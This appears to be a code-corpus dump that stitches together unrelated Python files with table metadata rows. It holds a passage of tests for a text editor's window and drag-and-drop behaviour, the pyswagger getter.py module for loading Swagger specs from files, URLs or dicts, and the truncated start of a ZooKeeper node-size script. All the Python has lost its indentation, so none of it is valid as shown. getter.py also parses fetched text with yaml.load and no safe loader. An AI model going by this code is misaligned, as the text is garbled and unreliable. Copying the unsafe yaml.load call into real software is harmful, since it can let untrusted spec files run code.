c = TestConfig(col_is_editable=True, item_is_project=True, result=False)
yield test, c(col_is_editable=False)
yield test, c(item_is_project=False)
yield test, c(can_rename=False)
yield test, c(can_rename=True, result=True)
def test_copy_path():
pasteboard = mod.Pasteboard()
@gentest
def test(index, text, config="editor(a) editor(b)*"):
with test_app(config) as app:
window = app.windows[0]
item = [editor for project in window.projects
for editor in project.editors][index]
window.copy_path(item)
eq_(pasteboard.text, text)
yield test(0, "a")
yield test(1, "b")
yield test(0, "a\nc", config="editor(a)* editor(b) editor(c)*")
yield test(1, "b", config="editor(a)* editor(b) editor(c)*")
def test_close_item():
@gentest
def test(index=1, expected="editor(a)*", config="editor(a) editor(b)*"):
with test_app(config) as app:
window = app.windows[0]
item = [editor for project in window.projects
for editor in project.editors][index]
window.close_item(item)
eq_(test_app(app).state, ("window project " + expected).strip())
yield test()
yield test(0, "editor(b)*")
yield test(0, config="editor(a)* editor(b) editor(c)*", expected="editor(b)*")
yield test(2, config="editor(a)* editor(b) editor(c)*", expected="editor(b)*")
yield test(config="editor(a)* editor(b) editor(c)*", expected="editor(a)* editor(c)*")
def test_window_did_become_key():
@test_app
def test(app, c):
m = Mocker()
ed = Window(app)
win = m.mock(ak.NSWindowController)
cv = m.property(ed, "current_editor")
dv = cv.value >> (m.mock(c.editor_type) if c.has_current else None)
if c.has_current and c.editor_type is Editor:
dv.document.check_for_external_changes(win)
with m:
ed.window_did_become_key(win)
c = TestConfig(has_current=False, editor_type=Editor)
yield test, c
yield test, c(has_current=True)
yield test, c(has_current=True, editor_type=Project)
def test_Window_should_close():
@gentest
def test(config, prompts=[], should_close=False, close=True):
calls = []
def do_close():
calls.append("close")
with test_app(config) as app:
window = app.windows[0]
for win in app.windows:
for project in win.projects:
for editor in project.editors:
if "/dirty.save" in editor.file_path:
test_app(app).set_content(editor)
if "dirty" in editor.file_path:
make_dirty(editor.document)
result = window.should_close(do_close)
eq_(window.wc.prompts, prompts)
eq_(calls, ["close"] if close and not should_close else [])
eq_(result, should_close)
yield test("editor", should_close=True)
yield test("editor(dirty)", ["close dirty"], close=False)
yield test("editor(dirty.save)", ["close dirty.save", "save dirty.save"], close=False) # cancel save
yield test("editor(/dirty.save)", ["close dirty.save"])
yield test("editor(/dirty.missing)", ["close dirty.missing"], close=False)
yield test("editor(/dirty.dont_save)", ["close dirty.dont_save"])
yield test("editor(dirty) window project editor(dirty)", should_close=True)
def test_window_will_close():
@test_app
def test(app, window_settings_loaded, num_projects):
m = Mocker()
ed = Window(app)
ed.window_settings_loaded = window_settings_loaded
app = m.replace(ed, 'app')
with m.order():
app.discard_window(ed)
with m:
ed.window_will_close()
yield test, True, 0
yield test, False, 0
yield test, False, 1
yield test, False, 3
def test_get_window_settings():
@test_app
def test(app, c):
settings = dict(
frame_string="<frame string>",
splitter_pos="<splitter_pos>",
properties_hidden=c.props_hidden,
)
m = Mocker()
ed = Window(app)
ed.wc = m.mock(WindowController)
ed.wc.frame_string >> settings["frame_string"]
ed.wc.splitter_pos >> settings["splitter_pos"]
ed.wc.properties_hidden >> (ak.NSOnState if c.props_hidden else ak.NSOffState)
with m:
result = ed.window_settings
eq_(result, settings)
c = TestConfig()
yield test, c(props_hidden=True)
yield test, c(props_hidden=False)
def test_set_window_settings_with_null_settings():
with test_app() as app:
ed = Window(app)
class FakeWindowController(TestConfig):
def __setattr__(self, name, value):
self.__dict__[name] = value
ed.wc = FakeWindowController()
ed.window_settings = {}
eq_(ed.wc, FakeWindowController(properties_hidden=False))
def test_set_window_settings():
with test_app() as app:
m = Mocker()
ed = Window(app)
ed.wc = m.mock(WindowController)
fs = "<test frame string>"
sp = "<test splitter position>"
ed.wc.frame_string = fs
ed.wc.splitter_pos = sp
ed.wc.properties_hidden = True
with m:
ed.window_settings = dict(frame_string=fs, splitter_pos=sp, properties_hidden=True)
def test_close():
@test_app
def test(app, c):
m = Mocker()
ed = Window(app)
ed.wc = wc = m.mock(WindowController)
ed.projects = []
ed.window_settings_loaded = c.ws_loaded
for x in range(3):
proj = m.mock(Project)
proj.close()
ed.projects.append(proj)
#wc.docsController.setContent_(None)
with m:
if not c.wc_is_none:
assert ed.wc is not None
assert list(ed.projects)
ed.close()
assert not ed.window_settings_loaded
#assert ed.wc is None
#assert not list(ed.projects)
c = TestConfig(wc_is_none=False)
yield test, c(wc_is_none=True, ws_loaded=False)
for wsl in (True, False):
yield test, c(ws_loaded=wsl)
# drag/drop tests ~~~~~~~~~~~~~~~~~~~~~~~
def test_is_project_drag():
@test_app
def test(app, c):
m = Mocker()
ed = Window(app)
ed.iter_dropped_id_list = m.method(ed.iter_dropped_id_list)
pb = m.mock(ak.NSPasteboard)
result_items = []
info = m.mock() #NSDraggingInfo
items = []
pb = info.draggingPasteboard() >> m.mock(ak.NSPasteboard)
pb.availableTypeFromArray_(ed.supported_drag_types) >> c.accepted_type
if c.accepted_type == const.DOC_ID_LIST_PBOARD_TYPE:
id_list = pb.propertyListForType_(const.DOC_ID_LIST_PBOARD_TYPE) >> m.mock()
ed.iter_dropped_id_list(id_list) >> items
factories = dict(
p=(lambda:m.mock(Project)),
d=(lambda:m.mock(Editor)),
)
elif c.accepted_type == ak.NSFilenamesPboardType:
pb.propertyListForType_(ak.NSFilenamesPboardType) >> items
factories = dict(
p=(lambda:"/path/to/project." + const.PROJECT_EXT),
d=(lambda:"/path/to/document.txt"),
)
else:
factories = None
if factories is not None:
for it in c.items:
items.append(factories[it]())
with m:
result = ed.is_project_drag(info)
eq_(result, c.result)
c = TestConfig(result=False)
yield test, c(items="", accepted_type="unknown type")
for atype in (const.DOC_ID_LIST_PBOARD_TYPE, ak.NSFilenamesPboardType):
for items in ("d", "p", "pdp", "ppp"):
result = not items.replace("p", "")
yield test, c(items=items, accepted_type=atype, result=result)
def test_get_id_path_pairs():
@gentest
def test(config, indices, path_info):
def getitem(index):
item = window.projects[index[0]]
if len(index) > 1:
item = item.editors[index[1]]
if item.document.has_real_path():
assert item.file_path.startswith(tmp), item.file_path
with open(item.file_path, "w") as fh:
pass
assert len(index) < 3, index
return item
with test_app(config) as app:
tmp = test_app(app).tmp + os.path.sep
window = app.windows[0]
items = [getitem(i) for i in indices]
result = app.windows[0].get_id_path_pairs(items)
eq_(len(result), len(items))
eq_(len(result), len(path_info))
for item, has_path, pair in zip(items, path_info, result):
eq_(pair[0], item.id, item)
eq_(pair[1], item.file_path if has_path else None)
yield test("project", [[0]], [False])
yield test("project editor", [[0, 0]], [False])
yield test("project editor(/file.txt)", [[0, 0]], [True])
def test_validate_drop():
@test_app
def test(app, config):
m = Mocker()
ed = Window(app)
ed.wc = m.mock(WindowController)
ov = m.mock(ak.NSOutlineView)
# TODO investigate where NSDraggingInfo went during the upgrade to 10.5
info = m.mock() #NSDraggingInfo)
item = m.mock()
index = 0
ed.is_project_drag = m.method(ed.is_project_drag)
ed.is_project_drag(info) >> config.is_proj
if config.is_proj:
if not config.item_is_none:
obj = "<item.observedObject>"
representedObject(item) >> obj
if config.path_is_none:
path = None
else:
path = m.mock(fn.NSIndexPath)
path.indexAtPosition_(0) >> config.path_index
ov.setDropItem_dropChildIndex_(None, config.path_index)
ed.wc.docsController.indexPathForObject_(obj) >> path
else:
item = None
index = config.index
if index < 0:
ed.projects = ["<proj>"] * config.num_projs
ov.setDropItem_dropChildIndex_(None, config.num_projs)
else:
drop = True
if not config.item_is_none:
if config.item_is_proj:
index = config.index
obj = m.mock(type=Project)
if index < 0:
obj.editors >> (["<doc>"] * config.proj_docs)
ov.setDropItem_dropChildIndex_(item, config.proj_docs)
else:
obj = m.mock(type=Editor)
drop = False
representedObject(item) >> obj
else:
item = None
index = config.index
if config.index < 0:
ed.projects = ["<proj>"] * (config.last_proj_index + 1)
if config.last_proj_index > -1:
path = fn.NSIndexPath.indexPathWithIndex_(config.last_proj_index)
proj = m.mock(Project)
node = m.mock()
ed.wc.docsController.nodeAtArrangedIndexPath_(path) >> node
representedObject(node) >> proj
proj.editors >> (["<doc>"] * config.proj_docs)
ov.setDropItem_dropChildIndex_(node, config.proj_docs)
else:
ov.setDropItem_dropChildIndex_(None, -1)
elif index == 0:
drop = False
if drop:
info.draggingSourceOperationMask() >> ak.NSDragOperationGeneric
with m:
result = ed.validate_drop(ov, info, item, index)
eq_(result, config.result)
cfg = TestConfig(is_proj=True, item_is_none=False, result=ak.NSDragOperationMove)
for i in (-1, 0, 1, 2):
yield test, cfg(item_is_none=True, index=i, num_projs=2)
yield test, cfg(path_is_none=True, result=ak.NSDragOperationNone)
for p in (0, 1, 2):
yield test, cfg(path_is_none=False, path_index=p)
cfg = cfg(is_proj=False, result=ak.NSDragOperationGeneric)
for i in (-1, 0, 2):
yield test, cfg(item_is_proj=True, index=i, proj_docs=2)
yield test, cfg(item_is_proj=False, result=ak.NSDragOperationNone)
cfg = cfg(item_is_none=True)
yield test, cfg(index=-1, last_proj_index=-1)
yield test, cfg(index=-1, last_proj_index=0, proj_docs=0)
yield test, cfg(index=-1, last_proj_index=0, proj_docs=2)
yield test, cfg(index=-1, last_proj_index=2, proj_docs=2)
yield test, cfg(index=0, result=ak.NSDragOperationNone)
yield test, cfg(index=1)
yield test, cfg(index=2)
def test_accept_drop():
@test_app
def test(app, c):
m = Mocker()
ed = Window(app)
ed.wc = m.mock(WindowController)
ed.insert_items = m.method(ed.insert_items)
ed.iter_dropped_id_list = m.method(ed.iter_dropped_id_list)
ed.iter_dropped_paths = m.method(ed.iter_dropped_paths)
ov = m.mock(ak.NSOutlineView)
# TODO investigate where NSDraggingInfo went during the upgrade to 10.5
parent = None if c.item_is_none else m.mock()
index = 0
items = m.mock()
pb = m.mock(ak.NSPasteboard)
pb.availableTypeFromArray_(ed.supported_drag_types) >> c.accepted_type
if c.accepted_type == const.DOC_ID_LIST_PBOARD_TYPE:
id_list = pb.propertyListForType_(const.DOC_ID_LIST_PBOARD_TYPE) >> m.mock()
ed.iter_dropped_id_list(id_list) >> items
act = c.act
elif c.accepted_type == ak.NSFilenamesPboardType:
act = None
paths = pb.propertyListForType_(ak.NSFilenamesPboardType) >> m.mock()
items = ed.iter_dropped_paths(paths) >> items
else:
items = None
assert c.accepted_type is None
if items is not None:
ed.insert_items(items, parent, index, act) >> c.result
with m:
result = ed.accept_drop(ov, pb, parent, index, c.act)
eq_(result, c.result)
c = TestConfig(result=True, item_is_none=False, act=None)
yield test, c(accepted_type=const.DOC_ID_LIST_PBOARD_TYPE)
yield test, c(accepted_type=const.DOC_ID_LIST_PBOARD_TYPE, act=const.COPY)
yield test, c(accepted_type=const.DOC_ID_LIST_PBOARD_TYPE, act=const.MOVE)
yield test, c(accepted_type=ak.NSFilenamesPboardType)
yield test, c(accepted_type=ak.NSFilenamesPboardType, item_is_none=True)
yield test, c(accepted_type=None, result=False)
def test_iter_dropped_id_list():
@test_app
def test(app, c):
m = Mocker()
ed = Window(app, None)
app = m.replace(ed, 'app')
result_items = []
if c.has_ids:
ids = []
for it in c.ids:
ids.append(it.id)
item = m.mock()
app.find_item_with_id(it.id) >> (item if it.found else None)
if it.found:
result_items.append(item)
else:
ids = None
with m:
result = list(ed.iter_dropped_id_list(ids))
eq_(result, result_items)
c = TestConfig(has_ids=True)
ix = lambda id, found=True: TestConfig(id=id, found=found)
yield test, c(has_ids=False)
yield test, c(ids=[])
yield test, c(ids=[ix(0)])
yield test, c(ids=[ix(0), ix(1)])
yield test, c(ids=[ix(0, False)])
yield test, c(ids=[ix(0), ix(1, False)])
def test_iter_dropped_paths():
def doc(num, tmp):
path = os.path.join(tmp, "doc%s.txt" % num)
with open(path, mode="w") as fh:
fh.write('doc')
return path
def sym(num, tmp):
path = os.path.join(tmp, "doc%s.sym" % num)
os.symlink(path + ".txt", path)
return path
def proj(num, tmp):
path = os.path.join(tmp, "proj_%s" % num)
os.mkdir(path)
return path
@test_app
def test(app, c):
m = Mocker()
ed = Window(app)
app = m.replace(ed, 'app')
dc = m.mock(DocumentController)
result_items = []
with tempdir() as tmp:
if c.has_paths:
paths = []
for it in c.paths:
path = it.create(tmp)
paths.append(path)
if it.ignored:
continue
doc = app.document_with_path(path) \
>> m.mock(path, spec=TextDocument)
result_items.append(doc)
else:
paths = None
with m:
result = list(ed.iter_dropped_paths(paths))
eq_(result, result_items)
c = TestConfig(has_paths=True)
def path(create, ignored=False, num=[0]):
num[0] += 1
if create is None:
return TestConfig(create=(lambda tmp: None), ignored=ignored)
return TestConfig(create=partial(create, num[0]), ignored=ignored)
yield test, c(has_paths=False)
yield test, c(paths=[])
yield test, c(paths=[path(None)])
yield test, c(paths=[path(doc)])
yield test, c(paths=[path(sym)])
yield test, c(paths=[path(doc), path(sym), path(doc)])
yield test, c(paths=[path(proj, ignored=True)])
# yield test, c(paths=[path(proj)])
# yield test, c(paths=[path(proj), path(doc), path(proj)])
#yield test, c(paths=[path(proj, is_open=False)])
def test_insert_items():
def test(c):
def get_parent_index(drop, offset=0):
if any(v in '0123456789' for v in drop[0]):
assert all(v in '0123456789' for v in drop[0]), drop
return None, pindex
return project, dindex + offset
def namechar(item, seen=set()):
name = test_app(app).name(item)
name = name[len(type(item).__name__):]
assert name.startswith(("(", "[", "<")), name
assert name.endswith((")", "]", ">")), name
name = name[1:-1]
assert name not in seen, (item, name)
seen.add(name)
return name
config = []
pindex = dindex = -1
project = None
for i, char in enumerate(c.init + ' '):
if char == "|":
config.append("window")
pindex = dindex = -1
continue
if char == ' ':
if i == c.drop[1]:
offset = 1 if project is not None else 0
parent, index = get_parent_index(c.drop, offset)
dindex = -1
continue
if char == "*":
config[-1] += "*"
if i == c.drop[1]:
raise ValueError("invalid drop index: {!r}".format(c.drop))
continue
name = "({})".format(char)
if char in '0123456789':
item = project = "project" + name
pindex += 1
else:
item = "editor" + name
dindex += 1
config.append(item)
if i == c.drop[1]:
parent, index = get_parent_index(c.drop)
config = " ".join(config)
print(config)
with test_app(config) as app:
name_to_item = {}
for window in app.windows:
for project in window.projects:
char = namechar(project)
project.name = char
name_to_item[char] = project
for editor in project.editors:
char = namechar(editor)
editor.document.file_path = char
name_to_item[char] = editor
for char in c.drop[0]:
if char not in name_to_item and char not in '0123456789':
name_to_item[char] = TextDocument(app, char)
items = [name_to_item[char] for char in c.drop[0]] \
if "*" in c.final and c.init != c.final else []
window = app.windows[0]
if "project" in c:
eq_(c.drop[1], -1, "invalid test configuration; drop index "
"must be -1 when project is specified")
parent = c.project
index = c.drop[1]
if c.project == const.CURRENT:
args = ()
elif c.project is None:
args = (None,)
else:
args = (name_to_item[c.project],)
else:
if parent is None:
project = window.get_current_project()
if project is not None:
parent = "project(%s)" % project.name
if parent is not None:
parent = name_to_item[parent[8:-1]]
if index < 0:
index = len(parent.editors)
args = (parent, index, c.action)
print('drop(%s) %s at %s of %s' % (c.action, c.drop[0], index, parent))
result = window.insert_items(items, *args)
eq_(len(result), len(items))
final = ["window"]
for char in c.final:
if char == " ":
continue
if char == "|":
final.append("window")
continue
if char == "*":
final[-1] += "\\*"
continue
name = r"\({}\)".format(char)
if char in "0123456789":
if char not in c.init:
name = r"\[.\]"
final.append("project" + name)
continue
if char.isupper():
name = "\[{} .\]".format(char.lower())
final.append("editor" + name)
final = "^" + " ".join(final) + "$"
eq_(test_app(app).state, Regex(final, repr=final.replace("\\", "")))
def eq(a, b):
msg = lambda:"{} != {}".format(
test_app(app).name(a),
test_app(app).name(b),
)
eq_(a, b, msg)
for window in app.windows:
for project in window.projects:
eq(project.window, window)
for editor in project.editors:
eq(editor.project, project)
# number = project
# letter in range a-f = document
# letter in rnage A-F = new editor of document
# space before project allows drop on project (insert at end)
# pipe (|) delimits windows
# so ' 0ab*c 1 2de| 3*fa' is...
# window
# project 0
# document a
# document b (currently selected)
# document c
# project 1
# project 2
# document d
# document e
# window
# project 3 (currently selected)
# document f
# document a
#
# drop=(<dropped item(s)>, <drop index in init>)
config = TestConfig(init=' 0ab*c 1 2de')
c = config(action=const.MOVE)
yield test, c(drop=('', 0), final=' 0ab*c 1 2de')
yield test, c(drop=('', 1), final=' 0ab*c 1 2de')
yield test, c(drop=('', 2), final=' 0ab*c 1 2de')
yield test, c(drop=('', 3), final=' 0ab*c 1 2de')
yield test, c(drop=('', 5), final=' 0ab*c 1 2de')
yield test, c(drop=('', 6), final=' 0ab*c 1 2de')
yield test, c(drop=('', 7), final=' 0ab*c 1 2de')
yield test, c(drop=('', 8), final=' 0ab*c 1 2de')
yield test, c(drop=('', 9), final=' 0ab*c 1 2de')
yield test, c(drop=('', 10), final=' 0ab*c 1 2de')
yield test, c(drop=('', 11), final=' 0ab*c 1 2de')
yield test, c(drop=('', 12), final=' 0ab*c 1 2de')
yield test, c(drop=('a', 0), final=' 0bca* 1 2de')
yield test, c(drop=('a', 1), final=' 0bca* 1 2de')
yield test, c(drop=('a', 2), final=' 0ab*c 1 2de')
yield test, c(drop=('a', 3), final=' 0ab*c 1 2de')
yield test, c(drop=('a', 5), final=' 0ba*c 1 2de')
yield test, c(drop=('a', 6), final=' 0bca* 1 2de')
yield test, c(drop=('a', 7), final=' 0bc 1a* 2de')
yield test, c(drop=('a', 8), final=' 0bc 1a* 2de')
yield test, c(drop=('a', 9), final=' 0bc 1 2dea*')
yield test, c(drop=('a', 10), final=' 0bc 1 2a*de')
yield test, c(drop=('a', 11), final=' 0bc 1 2da*e')
yield test, c(drop=('a', 12), final=' 0bc 1 2dea*')
yield test, c(drop=('f', 0), final=' 0abcF* 1 2de')
yield test, c(drop=('f', 1), final=' 0abcF* 1 2de')
yield test, c(drop=('f', 2), final=' 0F*abc 1 2de')
yield test, c(drop=('f', 3), final=' 0aF*bc 1 2de')
yield test, c(drop=('f', 5), final=' 0abF*c 1 2de')
yield test, c(drop=('f', 6), final=' 0abcF* 1 2de')
yield test, c(drop=('f', 7), final=' 0abc 1F* 2de')
yield test, c(drop=('f', 8), final=' 0abc 1F* 2de')
yield test, c(drop=('f', 9), final=' 0abc 1 2deF*')
yield test, c(drop=('f', 10), final=' 0abc 1 2F*de')
yield test, c(drop=('f', 11), final=' 0abc 1 2dF*e')
yield test, c(drop=('f', 12), final=' 0abc 1 2deF*')
yield test, c(drop=('2', 0), final=' 0abc 1 2*de')
yield test, c(drop=('2', 1), final=' 2*de 0abc 1')
yield test, c(drop=('2', 2), final=' 2*de 0abc 1')
yield test, c(drop=('2', 3), final=' 2*de 0abc 1')
yield test, c(drop=('2', 5), final=' 2*de 0abc 1')
yield test, c(drop=('2', 6), final=' 2*de 0abc 1')
yield test, c(drop=('2', 7), final=' 0abc 2*de 1')
yield test, c(drop=('2', 8), final=' 0abc 2*de 1')
yield test, c(drop=('2', 9), final=' 0ab*c 1 2de')
yield test, c(drop=('2', 10), final=' 0ab*c 1 2de')
yield test, c(drop=('2', 11), final=' 0ab*c 1 2de')
yield test, c(drop=('2', 12), final=' 0ab*c 1 2de')
c = config(action=const.COPY)
yield test, c(drop=('', 0), final=' 0ab*c 1 2de')
yield test, c(drop=('', 1), final=' 0ab*c 1 2de')
yield test, c(drop=('', 2), final=' 0ab*c 1 2de')
yield test, c(drop=('', 3), final=' 0ab*c 1 2de')
yield test, c(drop=('', 5), final=' 0ab*c 1 2de')
yield test, c(drop=('', 6), final=' 0ab*c 1 2de')
yield test, c(drop=('', 7), final=' 0ab*c 1 2de')
yield test, c(drop=('', 8), final=' 0ab*c 1 2de')
yield test, c(drop=('', 9), final=' 0ab*c 1 2de')
yield test, c(drop=('', 10), final=' 0ab*c 1 2de')
yield test, c(drop=('', 11), final=' 0ab*c 1 2de')
yield test, c(drop=('', 12), final=' 0ab*c 1 2de')
yield test, c(drop=('a', 0), final=' 0abcA* 1 2de')
yield test, c(drop=('a', 1), final=' 0abcA* 1 2de')
yield test, c(drop=('a', 2), final=' 0A*abc 1 2de')
yield test, c(drop=('a', 3), final=' 0aA*bc 1 2de')
yield test, c(drop=('a', 5), final=' 0abA*c 1 2de')
yield test, c(drop=('a', 6), final=' 0abcA* 1 2de')
yield test, c(drop=('a', 7), final=' 0abc 1A* 2de')
yield test, c(drop=('a', 8), final=' 0abc 1A* 2de')
yield test, c(drop=('a', 9), final=' 0abc 1 2deA*')
yield test, c(drop=('a', 10), final=' 0abc 1 2A*de')
yield test, c(drop=('a', 11), final=' 0abc 1 2dA*e')
yield test, c(drop=('a', 12), final=' 0abc 1 2deA*')
c = config(action=None)
yield test, c(drop=('', 0), final=' 0ab*c 1 2de')
yield test, c(drop=('', 1), final=' 0ab*c 1 2de')
yield test, c(drop=('', 2), final=' 0ab*c 1 2de')
yield test, c(drop=('', 3), final=' 0ab*c 1 2de')
yield test, c(drop=('', 5), final=' 0ab*c 1 2de')
yield test, c(drop=('', 6), final=' 0ab*c 1 2de')
yield test, c(drop=('', 7), final=' 0ab*c 1 2de')
yield test, c(drop=('', 8), final=' 0ab*c 1 2de')
yield test, c(drop=('', 9), final=' 0ab*c 1 2de')
yield test, c(drop=('', 10), final=' 0ab*c 1 2de')
yield test, c(drop=('', 11), final=' 0ab*c 1 2de')
yield test, c(drop=('', 12), final=' 0ab*c 1 2de')
yield test, c(drop=('a', 0), final=' 0a*bc 1 2de')
yield test, c(drop=('a', 1), final=' 0a*bc 1 2de')
yield test, c(drop=('a', 2), final=' 0a*bc 1 2de')
yield test, c(drop=('a', 3), final=' 0a*bc 1 2de')
yield test, c(drop=('a', 5), final=' 0a*bc 1 2de')
yield test, c(drop=('a', 6), final=' 0a*bc 1 2de')
yield test, c(drop=('a', 7), final=' 0abc 1A* 2de')
yield test, c(drop=('a', 8), final=' 0abc 1A* 2de')
yield test, c(drop=('a', 9), final=' 0abc 1 2deA*')
yield test, c(drop=('a', 10), final=' 0abc 1 2A*de')
yield test, c(drop=('a', 11), final=' 0abc 1 2dA*e')
yield test, c(drop=('a', 12), final=' 0abc 1 2deA*')
yield test, c(drop=('f', 0), final=' 0abcF* 1 2de')
yield test, c(drop=('f', 1), final=' 0abcF* 1 2de')
yield test, c(drop=('f', 2), final=' 0F*abc 1 2de')
yield test, c(drop=('f', 3), final=' 0aF*bc 1 2de')
yield test, c(drop=('f', 5), final=' 0abF*c 1 2de')
yield test, c(drop=('f', 6), final=' 0abcF* 1 2de')
yield test, c(drop=('f', 7), final=' 0abc 1F* 2de')
yield test, c(drop=('f', 8), final=' 0abc 1F* 2de')
yield test, c(drop=('f', 9), final=' 0abc 1 2deF*')
yield test, c(drop=('f', 10), final=' 0abc 1 2F*de')
yield test, c(drop=('f', 11), final=' 0abc 1 2dF*e')
yield test, c(drop=('f', 12), final=' 0abc 1 2deF*')
# cannot copy project yet
# yield test, c(drop=('2', 0), final=' 0abc 1 2de')
# yield test, c(drop=('2', 1), final=' 2de 0abc 1')
# yield test, c(drop=('2', 2), final=' 2de 0abc 1')
# yield test, c(drop=('2', 3), final=' 2de 0abc 1')
# yield test, c(drop=('2', 4), final=' 2de 0abc 1')
# yield test, c(drop=('2', 5), final=' 2de 0abc 1')
# yield test, c(drop=('2', 6), final=' 0abc 2de 1')
# yield test, c(drop=('2', 7), final=' 0abc 2de 1')
# yield test, c(drop=('2', 8), final=' 0abc 1 2de')
# yield test, c(drop=('2', 9), final=' 0abc 1 2de')
# yield test, c(drop=('2', 10), final=' 0abc 1 2de')
# yield test, c(drop=('2', 11), final=' 0abc 1 2de')
c = config(action=None, init=' 0ab*c 1 2de')
yield test, c(drop=('a', -1), final=' 0a*bc 1 2de', project=const.CURRENT)
yield test, c(drop=('a', -1), final=' 0a*bc 1 2de', project=None)
yield test, c(drop=('a', -1), final=' 0abc 1 2deA*', project='2')
c = config(action=None, init=' 0abc 1* 2de')
yield test, c(drop=('a', -1), final=' 0abc 1A* 2de', project=const.CURRENT)
yield test, c(drop=('a', -1), final=' 0abc 1A* 2de', project=None)
yield test, c(drop=('a', -1), final=' 0abc 1 2deA*', project='2')
c = config(action=None, init=' 0abc 1 2de*')
yield test, c(drop=('a', -1), final=' 0abc 1 2deA*', project=const.CURRENT)
yield test, c(drop=('a', -1), final=' 0abc 1 2deA*', project=None)
yield test, c(drop=('a', -1), final=' 0abc 1 2deA*', project='2')
c = config(init=' 0a | 1bc', action=const.MOVE)
yield test, c(drop=('b', 1), final=' 0ab* | 1c*')
yield test, c(drop=('b', 2), final=' 0b*a | 1c*')
yield test, c(drop=('1', 0), final=' 0a 1*bc |')
yield test, c(drop=('1', 1), final=' 1*bc 0a |')
# TODO implement move
# c = config(init=' 0a* | 1b*c', action=const.MOVE)
# yield test, c(drop=('b', 1), final=' 0ab* | 1c*')
# yield test, c(drop=('b', 2), final=' 0b*a | 1c*')
#
# yield test, c(drop=('1', 0), final=' 0a 1b*c |')
# yield test, c(drop=('1', 1), final=' 1b*c 0a |')
#yield test, c(drop=('a', 6), final=' 0 | 1bca*') # should fail (item inserted in wrong window)
def test_undo_manager():
@gentest
def test(config, has_doc=True, check_editor=True):
with test_app(config) as app:
window = app.windows[0]
result = window.undo_manager
if has_doc:
eq_(result, window.current_editor.undo_manager)
else:
eq_(result, window.no_document_undo_manager)
if check_editor:
eq_(window.current_editor, None)
yield test("window", has_doc=False)
yield test("window project", has_doc=False)
yield test("window project* editor")
yield test("window project editor* editor")
yield test("window project editor editor*")
| gpl-3.0 | 5,623,553,323,998,416,000 | 38.21772 | 104 | 0.535104 | false | 3.486658 | true | false | false |
mission-liao/pyswagger | pyswagger/getter.py | 1 | 5406 | from __future__ import absolute_import
from .consts import private
from .utils import patch_path
import json
import yaml
import six
import os
import logging
import re
logger = logging.getLogger(__name__)
class Getter(six.Iterator):
""" base of getter object
    Ideally, to subclass a getter, you just need to override the load function.
The part to extend getter would be finalized once Swagger 2.0 is ready.
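
    A minimal subclass sketch (illustrative; ``my_spec_store`` is a
    hypothetical dict mapping paths to raw spec strings)::

        class MemoryGetter(Getter):
            def load(self, path):
                return my_spec_store[path]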
"""
def __init__(self, path):
self.base_path = path
def __iter__(self):
return self
def __next__(self):
if len(self.urls) == 0:
raise StopIteration
obj = self.load(self.urls.pop(0))
        # normalize the loaded data: dicts pass through, bytes are decoded,
        # anything else must already be a string
if isinstance(obj, dict):
pass
elif isinstance(obj, six.binary_type):
obj = obj.decode('utf-8')
elif not isinstance(obj, six.string_types):
raise ValueError('Unknown types: [{0}]'.format(str(type(obj))))
# a very simple logic to distinguish json and yaml
if isinstance(obj, six.string_types):
try:
if obj.startswith('{'):
obj = json.loads(obj)
else:
obj = yaml.load(obj)
            except (ValueError, yaml.YAMLError):
raise Exception('Unknown format startswith {0} ...'.format(obj[:10]))
return obj
def load(self, path):
""" load the resource, and return for parsing.
:return: name and json object of resources
:rtype: (str, dict)
"""
raise NotImplementedError()
class LocalGetter(Getter):
""" default getter implmenetation for local resource file
"""
def __init__(self, path):
super(LocalGetter, self).__init__(path)
if path.startswith('file://'):
parsed = six.moves.urllib.parse.urlparse(path)
path = parsed.path
if re.match('^/[A-Z]+:', path) is not None:
path = os.path.abspath(path[1:])
for n in private.SWAGGER_FILE_NAMES:
if self.base_path.endswith(n):
self.base_path = os.path.dirname(self.base_path)
self.urls = [path]
break
else:
p = os.path.join(path, n)
if os.path.isfile(p):
self.urls = [p]
break
else:
            # no file matched the predefined file names:
            # - resource_list.json (1.2)
            # - swagger.json (2.0)
            # in this case, we locate the resource this way:
            # - 'path' points to a specific file whose
            #   extension is either 'json' or 'yaml'.
_, ext = os.path.splitext(path)
for e in [private.FILE_EXT_JSON, private.FILE_EXT_YAML, private.FILE_EXT_YML]:
if ext.endswith(e):
self.base_path = os.path.dirname(path)
self.urls = [path]
break
else:
for e in [private.FILE_EXT_JSON, private.FILE_EXT_YAML, private.FILE_EXT_YML]:
if os.path.isfile(path + '.' + e):
self.urls = [path + '.' + e]
break
else:
raise ValueError('Unable to locate resource file: [{0}]'.format(path))
def load(self, path):
logger.info('to load: [{0}]'.format(path))
path = patch_path(self.base_path, path)
logger.info('final path to load: [{0}]'.format(path))
ret = None
with open(path, 'r') as f:
ret = f.read()
return ret
class SimpleGetter(Getter):
""" the simple getter that don't have to concern file loading of LocalGetter
"""
__simple_getter_callback__ = lambda url: {}
""" the callback to load the resource, accept an URL and return a string buffer
"""
def __init__(self, path):
if isinstance(path, six.string_types):
super(SimpleGetter, self).__init__(path)
if self.base_path.endswith('/'):
self.base_path = self.base_path[:-1]
self.urls = [path]
else:
raise Exception('Unsupported type for "path": {} in SimpleGetter'.format(str(type(path))))
def load(self, path):
logger.info('to load: [{0}]'.format(path))
return self.__simple_getter_callback__.__func__(path)
def _url_load(path):
ret = f = None
try:
f = six.moves.urllib.request.urlopen(path)
ret = f.read()
finally:
if f:
f.close()
return ret
class UrlGetter(SimpleGetter):
""" default getter implementation for remote resource file
"""
__simple_getter_callback__ = _url_load
class DictGetter(Getter):
""" a getter accept a dict as parameter without loading from file / url
args:
- urls: the urls to be loaded in upcoming resolving (the order should be matched to get result correct)
- path2dict: a mapping from 'path' to 'dict', which is the mocking of 'downloaded data'
"""
def __init__(self, urls, path2dict):
super(DictGetter, self).__init__(urls[0])
self.urls = urls
self._path2dict = path2dict or {}
def load(self, path):
logger.info('to load: [{0}]'.format(path))
return self._path2dict.get(path, {})
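

# Usage sketch (illustrative; the URL is hypothetical):
#
#   getter = UrlGetter('http://example.com/swagger.json')
#   for obj in getter:
#       print(obj)  # each resolved resource as a parsed dict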
| mit | -6,257,545,884,173,601,000 | 30.248555 | 108 | 0.54606 | false | 4.061608 | false | false | false |
bkeep/bkeep-manager | get_size.py | 1 | 1389 | #cat get_size.py
# -*- coding: utf-8 -*-
"""遍历指定路径下所有节点的大小"""
from kazoo.client import KazooClient, KazooState
import socket,sys, os, time, atexit
class dzk:
def __init__(self,hosts,secs):
self.hosts = hosts
